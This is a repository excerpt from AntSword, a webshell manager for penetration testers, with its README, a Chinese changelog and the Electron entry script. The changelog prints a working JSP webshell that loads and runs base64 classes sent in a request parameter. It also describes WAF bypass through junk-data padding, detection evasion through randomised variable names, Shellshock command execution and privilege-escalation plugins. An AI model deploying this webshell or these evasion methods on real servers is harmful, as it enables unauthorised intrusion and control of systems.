README.md
# AntSword [![release](https://img.shields.io/badge/release-v2.1.9-blue.svg?style=flat-square)][url-release]

> AntSword in your hands, no worries in your mind！

**AntSword is an open source, cross-platform website administration tool, being designed to meet the needs of penetration testers together with security researchers with permissions and/or authorizations as well as webmasters.**

**Anyone shall not use it for illegal purposes and profitability. Besides that, publishing unauthorized modified version is also prohibited, or otherwise bear legal responsibilities.**

This software, of which the development thought is modularization, is intended to provide easy-to-understand codes and modification guidelines for users of different levels. Therefore, any contribution making by everyone to this project is encouraged, whether large or small. By doing so, this tool can be more convenient and consequently become your most powerful kit！

[中文说明][url-doczh] / [Document][url-document] / [Changelog][url-changelog]

## Development stack

- [Electron][url-electron]
- [ES6][url-es6]
- [dhtmlx][url-dhtmlx]
- [Nodejs][url-nodejs]
* And other libraries called in the project.

## Screenshots

![][url-mainui]

<details>

<summary>More Screenshots</summary>

![][url-filemanager]
![][url-terminal]
![][url-database]
![][url-pluginstore]

</details>

## Quick Start

See document: [Quick Start][url-quickstart]

## Contribute

See document: [Make contributions to AntSword][url-contribute]

## Thanks

> Thanks to anyone who made any contributions.

## LICENSE

[LICENSE](./LICENSE)

[url-doczh]: README_CN.md
[url-changelog]: CHANGELOG.md
[url-document]: http://doc.u0u.us/en/
[url-release]: https://github.com/AntSwordProject/AntSword/releases/
[url-electron]: http://electron.atom.io/
[url-es6]: http://es6.ruanyifeng.com/
[url-dhtmlx]: http://dhtmlx.com/
[url-nodejs]: https://nodejs.org/
[url-homepage]: http://uyu.us
[url-release]: https://github.com/AntSwordProject/AntSword/releases
[url-quickstart]: https://doc.u0u.us/en/getting_started/index.html
[url-contribute]: https://doc.u0u.us/en/contribute_docs.html
[url-mainui]: http://as.xuanbo.cc/doc/getting_started/get_antsword_2.jpg
[url-filemanager]: http://as.xuanbo.cc/doc/file_manager/main_page_1.png
[url-terminal]: http://as.xuanbo.cc/doc/terminal/main_page_1.png
[url-database]: http://as.xuanbo.cc/doc/database/main_page_1.png
[url-pluginstore]: http://as.xuanbo.cc/doc/plugin_store/main_page_2.jpg


CHANGELOG.md
# 更新日志
> 有空会补补BUG、添添新功能。    
> 同时也欢迎大家的参与！感谢各位朋友的支持！ .TAT.

## 2020/09/10 `v(2.1.9)`

### 核心

* 新增 JSP 类型一句话支持 (**试验功能**)

使用的 Shell 例如：

```
<%!
class U extends ClassLoader{
  U(ClassLoader c){
    super(c);
  }
  public Class g(byte []b){
    return super.defineClass(b,0,b.length);
  }
}
%>
<%
String cls=request.getParameter("ant");
if(cls!=null){
  new U(this.getClass().getClassLoader()).g(new sun.misc.BASE64Decoder().decodeBuffer(cls)).newInstance().equals(pageContext);
}
%>
```

> JSP 类型目前采用硬编码字节码方式, 编译版本为 jdk 1.7, 可根据使用场景自行编译。

代码模版参见: https://github.com/AntSwordProject/AntSword-JSP-Template

**注意**

JSP 类型 Shell 修改文件权限功能，不支持 Windows 系统，在 Linux 系统下不支持 SUID 设置

> 例如设置为 2644 实际上与 0644 效果相同

* 新增其他参数增加随机前缀

### 后端模块

* request 增加垃圾数据填充功能 (thx: @yzddmr6)

> 支持 form-data 和 multipart 模式

![mass_1.png](https://i.loli.net/2020/01/19/32HiSUvjPrMwfy5.png)

![mass_2.png](https://i.loli.net/2020/01/19/EaKruhcHklPFAe7.png)

![mass_3.png](https://i.loli.net/2020/01/19/UOX2HKuYyJQS7R1.png)

该模块不会改变 payload, 仅会填充垃圾数据, 部分基于 nginx 二次开发的 WAF 会因为过多参数导致 WAF 获取不到后面的数据，从而达到 Bypass 目的。

测试 paper 参见: [yzddmr6的 Blog —— 蚁剑改造计划之增加垃圾数据](https://yzddmr6.tk/posts/antsword-diy-1/)

### Security

* Fix ViewSite security issue #256

### 其它

* 插件支持的脚本类型支持通配符 `*`

> 如果插件的 package.json 文件中的 scripts 设置为 `*`, 则可被所有类型的插件调用。

## 2019/12/04 `v(2.1.8.1)`

* Fix ViewSite security issue thx @imagemlt

## 2019/12/04 `v(2.1.8)`

### 核心

* 修复全局过滤 xss 时 text 和 buff 过滤规则不一致问题
* core.command.exec 增加第 3个参数 env

 格式为: `key1|||askey|||val1|||asline|||key2|||askey|||val2|||asline|||`
 
 对应的环境变量为:

```
key1=val1
key2=val2
```

### 数据管理

* 新增「自定义数据分割符」配置

> 你可以将任何你喜欢的字符组合定义成数据的「起始符」或「结束符」

![data_separtor_1.png](https://i.loli.net/2019/11/05/per1BvOMh5IKZqt.png)

![data_separtor_2.png](https://i.loli.net/2019/11/05/QECmJprI5FldB9b.png)

* 修复「创建副本」时不会同步 decoder 的问题

### 文件管理

* 编辑文件新增「刷新」按钮

 > 如果服务器上的文件内容发生改变, 再也不需要关掉重打开了

* 新建文件默认内容更改为 `#Halo AntSword!`

* 编辑文件文件路径改为输入框, 现在可以手动输入文件路径后, 按 Enter 键快速打开文件了

![file_manager_filepath.png](https://i.loli.net/2019/12/04/rtpJCafoDLSBsAi.png)

### 虚拟终端

* 新增 `asenv` 本地指令, 用于手动设置当前终端下的环境变量

Linux:

![terminal_asenv_1.png](https://i.loli.net/2019/12/03/k3AgCmlNbIM8QDZ.png)

Windows:

![terminal_asenv_2.png](https://i.loli.net/2019/12/03/uzjvAgRT1Bdbkhw.png)

> 注意: asp 下设置之后, 当前机器上的IIS子进程都会受影响, 过一段时间子进程退出后正常

* 新增 `aswinmode` 本地指令, 在自动识别操作系统错误时, 可使用该指令手动切换命令行运行的模式 (#229 thx @nullnull1604-outlook)

![terminal_aswinmode.png](https://i.loli.net/2019/12/03/HpbjN6sERhYoiUX.png)

### 其它

* ACE 编辑器增加 `ace/mode/antswordjwt` 语法模式, 支持 JWT Token 语法高亮

## 2019/10/30 `v(2.1.7)`

### 安全更新

* fix #222 感谢 @9tail123
* **重要**: 增加全局 html 转义, 在每次响应后强制进行 html 转义, 避免过滤时漏掉的问题

 > 此更新会影响大部分插件的使用, 请及时更新插件或重装插件
 >
 > 如果在使用当中发现二次转义的情况, 请报告 issue

* 新增「报告漏洞」链接, 可在「关于程序」页中看到, 也可点下面的链接直达

 https://forms.gle/HrUMxedsyREeXw4R9

 > 如在后续发现漏洞, 请以该方式进行提交, 待修复后再公开

## 2019/09/17 `v(2.1.6)`

### 后端模块

* 修复数据截取 Bug
* 修复返回包`Content-Type`为非文本时连接异常问题 (#213)

### 核心模块

* 数据分割字符随机化增强(随机内容, 随机长度 5~12 位), 避免客户端发包产生固定的 `Content-Length`
* 新增 `antSword["RANDOMWORDS"]` 全局变量, 存放英文单词, 如需要定制字典请修改 `source/base/word.js`
* 新增 `antSword["utils"]` 全局变量, 包函 `RandomChoice`, `RandomLowercase` 函数
* 发包随机变量名去除 `_0x` 通用变量前缀
* 核心模版发包键名支持随机英文单词

### Shell 管理

* 新增「使用随机英文单词变量」配置项, 在发包时非密码变量名会使用随机产生的英文单词 (thx @Ch1ngg)

![ranword_1.png](https://i.loli.net/2019/09/03/vxVCiZ6znb2MGkt.png)

未勾选此配置项时, 发包变量名如下:

![randword_2.png](https://i.loli.net/2019/09/03/bEUonV3QXTa1pSD.png)

勾选此项设置后, 发包变量名如下:

![randword_3.png](https://i.loli.net/2019/09/03/iwRZF8gbh6WEdlO.png)

* 新增常用插件功能面板, 可自定义配置常用插件到此面板, 快速调用

![shell_toolbar.png](https://i.loli.net/2019/09/03/Wu82S65Oq3EPopt.png)

### 其它

* `jsp_custom_script_for_mysql` 提供 `AES` 编码解码示例
* `jsp_custom_script_for_mysql` 增加 Version 显示
* windows 下单击鼠标左键 Tray Icon 显示/隐藏 主窗口 改为 「双击」
* 默认设置新增 「使用随机英文单词变量」配置项
* 移除 shells 目录, 示例脚本已转至 [AwesomeScript](https://github.com/AntSwordProject/AwesomeScript) 仓库下

### 插件相关

* 新增插件「[SacnWebShell](https://github.com/virink/as_scanwebshell)」

 > 通过正则匹配，查找后门 webshell

 ![scanwebshell](https://i.loli.net/2019/09/17/jRXD3pLaV5sCUkr.png)

## 2019/08/19 `v(2.1.5)`

### 核心模块

* 修复 PHP4 命令执行语法错误 #199 (thx @ier005)
* PHP 执行命令模版代码默认加入常见环境变量 (issue from: https://www.t00ls.net/viewthread.php?tid=52205)

### 系统设置

* 「默认设置」新增「虚拟终端」配置块, 可设置默认字体缩放比例, 最小0.5倍, 最大2倍 (通过快捷键最大可到5倍)

> 拖动 slider bar 之后, 下方可实时预览效果, 点击保存后即可生效(无需重启)

![adefault_terminal.png](https://i.loli.net/2019/08/05/fbKlUpodTuFMVC3.png)

### 虚拟终端

* 新增 `options['tsize']` 可覆盖全局缩放设置
* 支持全局缩放配置 #203

### 插件相关

* 新增插件 [check_rwx-suid](https://github.com/phantom11235/check_rwx-suid) Author: @phantom11235

> 在目标服务器上查询可读可写可执行目录以及可用于suid提权的文件（支持asp,aspx,php）

![check_rwx_suid](https://i.loli.net/2019/08/08/czPuqAjHMD3xWnN.png)

* 新增插件 [inject_und3ad](https://github.com/phantom11235/inject_und3ad) Author: @phantom11235

* 「as_webshell_venom」更新到 `v3.2`

* 「绕过 Disable_functions」更新到 `v0.5`

### 其它

* 修复 Linux Gnome 桌面环境下 minimize 时窗口消失问题 #204

## 2019/07/16 `v(2.1.4)`

### 核心模块

* 增加 PHP 执行命令的函数(`proc_open`,`COM('Wscript.shell')`, `shellshock`) #194

  * `COM` 组件执行命令, 该模块为 Windows 专属, 需要目标在 php.ini 中打开 COM 选项: `com.allow_dcom = true`, 注意, PHP 5.4.5 后,com/dotnet模块已经成了单独的扩展, 所以还需要在 php.ini 中配置 `extension=php_com_dotnet.dll`, 如果 PHP < 5.4.5 则不需要。
  * `shellshock` 利用 bash 破壳(CVE-2014-6271)执行命令, 需要目标的 `/bin/sh` 链接为 `/bin/bash` 且存在破壳漏洞

* 新增全局变量 antSword['module'] 用于存放所有核心模块, 方便在插件中引入

### 文件管理

* 修复标签页编辑文件时,路径过长导致右侧按钮不显示的 bug (#192)
* 新建文件时, 默认内容前面加了 `#` 号(防止在shell当前目录下, 新建 `.htaccess` 语法错误导致整个目录无法解析)

### 虚拟终端

* 新增 `options['exec']` 用于替换当前 Terminal 中生成 payload 函数

### 插件相关

* [绕过 disable_functions](https://github.com/Medicean/as_bypass_php_disable_functions) 更新到 0.4

  * 新增「FastCGI/PHP-FPM」模式

   适用于PHP-FPM/FCGI 监听在 unix socket 或者 tcp socket 上时使用。常见的比如: nginx + fpm。IIS+FPM 使用的是「管道」通信，不适用。

  * 新增「Apache_Mod_CGI」模式

    利用 `.htaccess` 添加一个新的 cgi 后缀, 完成命令执行
  
  * 优化了 `.antproxy.php` 性能问题
  * 修复了 `.antproxy.php` 不会代理 querystring 的问题

source/app.entry.js
/**
 * 中国蚁剑::程序入口
 * 创建：2015/12/20
 * 更新：2016/05/02
 * 作者：蚁逅 <https://github.com/antoor>
 */

'use strict';

const fs = require('fs'),
  path = require('path'),
  electron = require('electron'),
  shell = electron.shell,
  remote = electron.remote,
  ipcRenderer = electron.ipcRenderer;

const Menubar = require('./base/menubar');
const CacheManager = require('./base/cachemanager');
const Decodes = require('./base/decodes');

const antSword = window.antSword = {
  /**
   * XSS过滤函数
   * @param  {String}  html 过滤前字符串
   * @param  {Boolean} wrap 是否过滤换行
   * @return {String}       过滤后的字符串
   */
  noxss: (html = '', wrap = true) => {
    let _html = String(html)
      .replace(/&/g, "&amp;")
      .replace(/'/g, "&apos;")
      .replace(/>/g, "&gt;")
      .replace(/</g, "&lt;")
      .replace(/"/g, "&quot;");
    if (wrap) {
      _html = _html.replace(/\n/g, '<br/>');
    }
    return _html;
  },
  /**
   * unxss
   * @param  {String}  html 转义的字符串
   * @param  {Boolean} wrap 是否反转义换行
   * @return {String}       反转义后的字符串
   */
  unxss: (html = '', wrap = true) => {
    let _html = String(html)
      .replace(/&apos;/g, "'")
      .replace(/&gt;/g, ">")
      .replace(/&lt;/g, "<")
      .replace(/&quot;/g, '"')
      .replace(/&amp;/g, "&");
    if (wrap) {
      _html = _html.replace(/<br\/>/g, '\n'); // 只替换 noxss 转义过的
    }
    return _html;
  },
  /**
   * 终端日志数据
   * @type {Array}
   */
  logs: [],
  /**
   * 自定义编码器
   * @type {Object}
   */
  encoders: {},
  /**
   * 自定义解码器
   * @type {Object}
   */
  decoders: {},
  /**
   * 核心模块
   * @type {Object}
   */
  core: {},
  /**
   * 插件列表
   * @type {Object}
   */
  plugins: {},
  /**
   * 操作模块
   * @type {Object}
   */
  modules: {},
  /**
   * 模块
   */
  module: {},
  /**
   * localStorage存储API
   * ? 如果只有一个key参数，则返回内容，否则进行设置
   * @param  {String} key   存储键值，必选
   * @param  {String} value 存储内容，可选
   * @param  {String} def   默认内容，可选
   * @return {None}       [description]
   */
  storage: (key, value, def) => {
    // 读取
    if (!value) {
      return localStorage.getItem(key) || def;
    };
    if (typeof (value) === "object")
      value = JSON.stringify(value);

    // 设置
    localStorage.setItem(key, value);
  },
  /**
   * 重新加载插件（包含开发者&&本地插件库
   * @return {[type]} [description]
   */
  reloadPlug() {
    antSword['plugins'] = {};
    // 加载插件：：本地
    let pluginHome = ipcRenderer.sendSync('store-config-plugPath');
    fs
      .readdirSync(pluginHome)
      .map((_) => {
        let pluginPath = path.join(pluginHome, _);
        // 如果不是目录，则跳过
        if (!fs.lstatSync(pluginPath).isDirectory()) {
          return
        }
        // 存储路径&&package信息到全局变量antSword['plugins']
        antSword['plugins'][_] = {
          _id: _,
          path: pluginPath,
          info: JSON.parse(fs.readFileSync(path.join(pluginPath, 'package.json')))
        }
      });
    // 加载插件：：开发
    let devPlugPath = antSword.storage('dev-plugPath');
    if (antSword.storage('isDev') === '1' && fs.existsSync(devPlugPath) && fs.lstatSync(devPlugPath).isDirectory()) {
      fs
        .readdirSync(devPlugPath)
        .map((_) => {
          let _path = path.join(devPlugPath, _);
          // 如果不是目录，则跳过
          if (!fs.lstatSync(_path).isDirectory()) {
            return
          }
          antSword['plugins'][_] = {
            _id: _,
            path: _path,
            info: JSON.parse(fs.readFileSync(path.join(_path, 'package.json')))
          }
        });
    }
    // 加载工具栏
    antSword.modules.shellmanager.toolbar.reloadToolbar()
  }
};

// 加载核心模板
antSword['core'] = require('./core/');

// 加载语言模板
antSword['language'] = require('./language/');

// 加载编码
antSword['encoders'] = (function () {
  var encoders = {
    asp: [],
    aspx: [],
    jsp: [],
    php: [],
    custom: []
  };
  var encoders_path = {
    asp: [],
    aspx: [],
    jsp: [],
    php: [],
    custom: []
  };
  let userencoder_path = path.join(remote.process.env.AS_WORKDIR, 'antData/encoders');
  // 初始化
  !fs.existsSync(userencoder_path) ?
    fs.mkdirSync(userencoder_path) :
    null;
  ['asp', 'aspx', 'php', 'jsp', 'custom'].map((t) => {
    !fs.existsSync(path.join(userencoder_path, `${t}`)) ?
      fs.mkdirSync(path.join(userencoder_path, `${t}`)) :
      null;
    let t_path = path.join(userencoder_path, `${t}/encoder/`);
    !fs.existsSync(t_path) ?
      fs.mkdirSync(t_path) :
      null;

    let es = fs.readdirSync(t_path);
    if (es) {
      es.map((_) => {
        if (!_.endsWith(".js")) {
          return
        }
        encoders[t].push(_.slice(0, -3));
        encoders_path[t].push(path.join(t_path, _.slice(0, -3)));
      });
    }
    antSword["core"][t].prototype.user_encoders = encoders_path[t];
  });

  // // custom let es = fs.readdirSync(userencoder_path); if(es){   es.map((_)=>{
  //    console.log(_);     let farr = _.split("#");
  // encoders[farr[0]].push(farr[1].slice(0,-3));   }); } default
  // ['asp','aspx','php','custom'].map((t)=>{
  // antSword["core"][t].prototype.encoders.map((e)=>{     encoders[t].push(e);
  // });   encoders[t] = encoders[t].unique(); });
  // fs.readdirSync(path.join(process.env.AS_WORKDIR,'encoder'),(err,f) => {
  // if(err || !f) return ;   console.debug(f);   let farr = f.split("#");
  // encoders[farr[0]].push(farr[1]); });
  return encoders;
})();

// 加载解码器
antSword['decoders'] = (function () {
  var decoders = {
    asp: [],
    aspx: [],
    php: [],
    jsp: [],
    custom: []
  };
  var decoders_path = {
    asp: [],
    aspx: [],
    php: [],
    jsp: [],
    custom: []
  };
  let userdecoder_path = path.join(remote.process.env.AS_WORKDIR, 'antData/encoders');
  // 初始化
  !fs.existsSync(userdecoder_path) ?
    fs.mkdirSync(userdecoder_path) :
    null;
    ['asp', 'aspx', 'php', 'jsp', 'custom'].map((t) => {
    !fs.existsSync(path.join(userdecoder_path, `${t}`)) ?
      fs.mkdirSync(path.join(userdecoder_path, `${t}`)) :
      null;
    let t_path = path.join(userdecoder_path, `${t}/decoder/`);
    !fs.existsSync(t_path) ?
      fs.mkdirSync(t_path) :
      null;

    let es = fs.readdirSync(t_path);
    if (es) {
      es.map((_) => {
        if (!_.endsWith(".js")) {
          return
        }
        decoders[t].push(_.slice(0, -3));
        decoders_path[t].push(path.join(t_path, _.slice(0, -3)));
      });
    }
    antSword["core"][t].prototype.user_decoders = decoders_path[t];
  });

  // // custom let es = fs.readdirSync(userdecoder_path); if(es){   es.map((_)=>{
  //    console.log(_);     let farr = _.split("#");
  // encoders[farr[0]].push(farr[1].slice(0,-3));   }); } default
  // ['asp','aspx','php','custom'].map((t)=>{
  // antSword["core"][t].prototype.encoders.map((e)=>{     encoders[t].push(e);
  // });   encoders[t] = encoders[t].unique(); });
  // fs.readdirSync(path.join(process.env.AS_WORKDIR,'encoder'),(err,f) => {
  // if(err || !f) return ;   console.debug(f);   let farr = f.split("#");
  // encoders[farr[0]].push(farr[1]); });
  return decoders;
})();

// 加载代理
const aproxy = {
  mode: antSword['storage']('aproxymode', false, 'noproxy'),
  port: antSword['storage']('aproxyport'),
  server: antSword['storage']('aproxyserver'),
  password: antSword['storage']('aproxypassword'),
  username: antSword['storage']('aproxyusername'),
  protocol: antSword['storage']('aproxyprotocol')
}
antSword['aproxymode'] = aproxy['mode'];

antSword['aproxyauth'] = (!aproxy['username'] || !aproxy['password']) ?
  '' :
  `${aproxy['username']}:${aproxy['password']}`;

antSword['aproxyuri'] = `${aproxy['protocol']}:\/\/${antSword['aproxyauth']}${antSword['aproxyauth'] === ""
  ? ""
  : "@"}${aproxy['server']}:${aproxy['port']}`;

// 通知后端设置代理
ipcRenderer.send('aproxy', {
  aproxymode: antSword['aproxymode'],
  aproxyuri: antSword['aproxyuri']
});

antSword['shell'] = shell;
antSword['remote'] = remote;
antSword['ipcRenderer'] = ipcRenderer;
antSword['CacheManager'] = CacheManager;
antSword['Decodes'] = new Decodes();
antSword['menubar'] = new Menubar();
antSword['RANDOMWORDS'] = require('./base/words');
antSword['utils'] = require('./base/utils');
antSword['package'] = require('../package');

// 加载模块列表
antSword['tabbar'] = new dhtmlXTabBar(document.body);
['shellmanager', 'settings', 'plugin'].map((_) => {
  let _module = require(`./modules/${_}/`);
  antSword['modules'][_] = new _module();
});

['shellmanager', 'settings', 'plugin', 'database', 'terminal', 'viewsite', 'filemanager'].map((_) => {
  antSword['module'][_] = require(`./modules/${_}/`);
})

// 移除加载界面&&设置标题
$('#loading').remove();
document.title = antSword['language']['title'] || 'AntSword';

/**
 * 日志组输出
 * - 日志只会输出最多100个字符，如果想查看全部数据，则可以通过antSword.logs[id]进行查看
 * @param  {Object} opt   日志对象[0=日志，1=对象]
 * @param  {String} color 输出颜色
 * @return {[type]}       [description]
 */
const groupLog = (opt, color) => {
  if (antSword.logs.length % 10 === 0) {
    console.group(`LOGS: ${antSword.logs.length}+`);
  }
  let lineNum = antSword['logs'].push(opt[1]) - 1;
  console.log(`%c0x${lineNum < 10
    ? '0' + lineNum
    : lineNum}\t${opt[0].substr(0, 100) + (opt[0].length > 100
      ? '..'
      : '')}`, `color:${color}`);
  if (antSword.logs.length % 10 === 0) {
    console.groupEnd();
  }
}

// 监听后端消息
ipcRenderer
  /**
   * 刷新UI（shellmanager侧边栏
   * @param  {[type]} 'reloadui' [description]
   * @param  {[type]} (          [description]
   * @return {[type]}            [description]
   */
  .on('reloadui', () => {
    setTimeout(() => {
      antSword
        .modules
        .shellmanager
        .category
        .cell
        .setWidth(222);
    }, 555);
  })
  /**
   * 通知提示 Loader 更新
   * @param  {[type]} 'notification-loader-update' [description]
   * @param  {[type]} (e,                   opt           [description]
   * @return {[type]}                       [description]
   */
  .on('notification-loader-update', (e, opt) => {
    const LANG = antSword["language"]["settings"]["update"];
    let n = new Notification(antSword['language']['update']['title'], {
      body: antSword['language']['update']['body'](opt['ver'])
    });
    n.addEventListener('click', () => {
      antSword
        .shell
        .openExternal(opt['url']);
    });
    layer.confirm(LANG['prompt']['loader_body'](opt['ver']), {
      icon: 3,
      shift: 6,
      title: LANG['prompt']['title']
    }, (_) => {
      antSword
        .shell
        .openExternal(opt['url']);
      antSword
        .remote
        .app
        .quit();
    });
  })
  /**
   * 通知提示更新
   * @param  {[type]} 'notification-update' [description]
   * @param  {[type]} (e,                   opt           [description]
   * @return {[type]}                       [description]
   */
  .on('notification-update', (e, opt) => {
    const LANG = antSword["language"]["settings"]["update"];
    let n = new Notification(antSword['language']['update']['title'], {
      body: antSword['language']['update']['body'](opt['ver'])
    });
    // 文件大小计算
    const getFileSize = (t) => {
      let i = false;
      let b = [
        "b",
        "Kb",
        "Mb",
        "Gb",
        "Tb",
        "Pb",
        "Eb"
      ];
      for (let q = 0; q < b.length; q++)
        if (t > 1024)
          t = t / 1024;
        else if (i === false)
        i = q;
      if (i === false)
        i = b.length - 1;
      return Math.round(t * 100) / 100 + " " + b[i];
    }
    n.addEventListener('click', () => {
      antSword
        .shell
        .openExternal(opt['url']);
    });
    const WIN = require('ui/window');
    let win = new WIN({
      title: antSword['language']['update']['title'],
      height: 430,
      width: 480
    });
    win
      .win
      .setIconCss("update-winicon");
    win
      .win
      .button("minmax")
      .hide();
    win
      .win
      .denyResize();
    let uplayout = win
      .win
      .attachLayout('1C');
    uplayout
      .cells('a')
      .hideHeader();

    let formdata = [{
      type: "label",
      name: "form_msg",
      label: LANG["prompt"]["body"](opt['ver']),
      offsetLeft: 5
    }, {
      type: "container",
      name: "form_body",
      label: "",
      inputWidth: 450,
      inputHeight: 300
    }, {
      type: "block",
      list: [{
        type: "newcolumn",
        offset: 20
      }, {
        type: "button",
        name: "updatebtn",
        value: `<i class="fa fa-cloud-download"></i> ${LANG["prompt"]["btns"]["ok"]}`,
        className: "background-color: #39c;"
      }, {
        type: "newcolumn",
        offset: 20
      }, {
        type: "button",
        name: "changelogbtn",
        value: `<i class="fa fa-chrome"></i> ${LANG["prompt"]["btns"]["changelog"]}`
      }, {
        type: "newcolumn",
        offset: 20
      }, {
        type: "button",
        name: "canclebtn",
        value: `<i class="fa fa-remove"></i> ${LANG["prompt"]["btns"]["no"]}`
      }]
    }];
    uplayout
      .cells('a')
      .attachForm(formdata, true);
    win
      .win
      .attachEvent('onParkUp', () => {
        if (win.win.isParked()) {
          win
            .win
            .wins
            ._winSetSize(win.win._idd, 240, (win.win.wins.w[win.win._idd].hdr.offsetHeight + win.win.wins.conf.ofs_h), false, true);
        }
        win
          .win
          .setPosition(document.body.clientWidth - 300, document.body.clientHeight - 150);
        return true;
      });
    win
      .win
      .attachEvent('onParkDown', () => {
        win
          .win
          .setDimension(478, 428);
        win
          .win
          .centerOnScreen();
        return true;
      });
    const form = uplayout
      .cells('a')
      .attachForm(formdata, true);
    let form_body = new dhtmlXLayoutObject(form.getContainer('form_body'), '1C');
    form_body
      .cells('a')
      .hideHeader();
    const marked = require('marked');
    let _html = `<html>
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <style type="text/css">
    body {
      zoom:80%;
    }
    img {
      width:100%;
    }
    </style>
    </head>
    <body>
      ${marked(opt['body']).replace(/<a.+?(href=".+?")/g, "<a")}
    </body>
    </html>`;
    form_body
      .cells('a')
      .attachHTMLString(`<iframe sandbox="" src="data:text/html;base64,${Buffer.from(_html).toString('base64')}" style="width:100%;height:100%;border:0;padding:0;margin:0;"></iframe>`);
    form.attachEvent("onButtonClick", (name) => {
      switch (name) {
        case "updatebtn":
          var workdir = antSword.remote.process.env.AS_WORKDIR;
          if (fs.existsSync(path.join(workdir, ".git/"))) {
            win.close();
            layer.alert(LANG["message"]["githint"](workdir));
            return
          }
          const hash = (String(+new Date) + String(Math.random()))
            .substr(10, 10)
            .replace('.', '_');
          //折叠
          win
            .win
            .park();
          antSword
            .ipcRenderer
            .send("update-download", {
              hash: hash
            });
          win
            .win
            .progressOn();
          win.setTitle(LANG["message"]["prepare"]);
          antSword['ipcRenderer'].on(`update-dlprogress-${hash}`, (event, progress, isprogress) => {
            if (isprogress == true) {
              win.setTitle(LANG["message"]["dling"](progress));
            } else {
              win.setTitle(LANG["message"]["dlingnp"](getFileSize(progress)));
            }
          }).once(`update-dlend-${hash}`, (event) => {
            win.setTitle(LANG["message"]["dlend"]);
            win
              .win
              .progressOff();
            toastr.success(antSword["language"]["success"], LANG["message"]["extract"]);
          }).once(`update-error-${hash}`, (event, err) => {
            win
              .win
              .progressOff();
            win.close();
            toastr.error(antSword["language"]['error'], LANG["message"]["fail"](err));
          });
          break;
        case "canclebtn":
          win.close();
          break;
        case "changelogbtn":
          antSword
            .shell
            .openExternal(opt['url']);
          break;
      }
    });
  }).on('update-success', (e, opt) => {
    const LANG = antSword['language']['settings']['update'];
    toastr.success(antSword["language"]["success"], LANG["message"]["success"]);
    layer.confirm(LANG['message']['success'], {
      icon: 1,
      shift: 6,
      title: LANG['prompt']['title']
    }, (_) => {
      // location.reload();
      antSword
        .remote
        .app
        .quit();
    });
  })
  /**
   * 重新加载本地插件
   * @param  {[type]} 'reloadPlug' [description]
   * @param  {[type]} (            [description]
   * @return {[type]}              [description]
   */
  .on('reloadPlug', antSword.reloadPlug.bind(antSword))
  /**
   * 后端日志输出
   * + 用于在前端控制台输出后端的日志
   * - 可使用`antSword.logs[id]`来获取详细日志
   */
  .on('logger-debug', (e, opt) => {
    groupLog(opt, '#607D8B');
  }).on('logger-info', (e, opt) => {
    groupLog(opt, '#4CAF50');
  }).on('logger-warn', (e, opt) => {
    groupLog(opt, '#FF9800');
  }).on('logger-fatal', (e, opt) => {
    groupLog(opt, '#E91E63');
  });

antSword.reloadPlug();
antSword['menubar'].reg('check-update', () => {
  antSword
    .ipcRenderer
    .send('check-update');
  antSword
    .ipcRenderer
    .send('check-loader-update');
});

if (new Date() - new Date(parseInt(antSword['storage']('lastautocheck', false, "0"))) >= 86400000) {
  // 检查更新
  antSword['storage']('lastautocheck', new Date().getTime());
  setTimeout(() => {
    antSword.ipcRenderer.send.bind(antSword.ipcRenderer, 'check-update');
    antSword.ipcRenderer.send.bind(antSword.ipcRenderer, 'check-loader-update');
  }, 1000 * 60);
}